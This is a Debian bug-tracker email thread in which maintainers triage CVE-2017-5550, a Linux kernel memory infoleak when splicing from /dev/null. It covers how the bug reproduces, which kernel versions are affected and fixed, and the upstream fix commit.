Control: retitle 854421 [CVE-2017-5550] kernel dumps arbitrary memory when splice()ing from /dev/null
On Tue 2017-02-07 20:21:31 -0500, Ben Hutchings wrote:
> Control: reassign -1 src:linux 4.9.2-2
> Control: close -1 4.9.6-3
> Control: severity -1 serious
> Control: tag -1 security
>
> On Tue, 2017-02-07 at 11:14 -0500, Daniel Kahn Gillmor wrote:
>> On Tue 2017-02-07 10:49:39 -0500, Daniel Kahn Gillmor wrote:
>> > git clone https://0xacab.org/dkg/debian-bug-854421
>> > cd debian-bug-854421
>> > make
>>
>> interestingly, on at least one machine i try this on, getting it to
>> reproduce is very infrequent with plain "make", even with the 20 tries
>> on kernel version 4.9.2-2.
>
> It's much less likely to happen if there's only one CPU.
>
>> however, "make strace" seems to tickle the bug further, and makes it
>> much more likely to reproduce on 4.9.2-2, even though it's only one
>> try.
>>
>> with kernel 4.9.6-3 i haven't been able to reproduce it with either
>> "make" or "make strace".
>
> This is CVE-2017-5550, fixed by:
> https://git.kernel.org/linus/b9dc6f65bc5e232d1c05fe34b5daadc7e8bbf1fb
Thanks for tracking that down, Ben. I can confirm that it's an infoleak
of the worst kind, unfortunately -- i filled the RAM of a root-owned
userspace process with an arbitrary string, and then triggered the dump
From a non-privileged process and managed to get copies of the arbitrary
string :(
--dkg
Attachment:
signature.asc
Description: PGP signature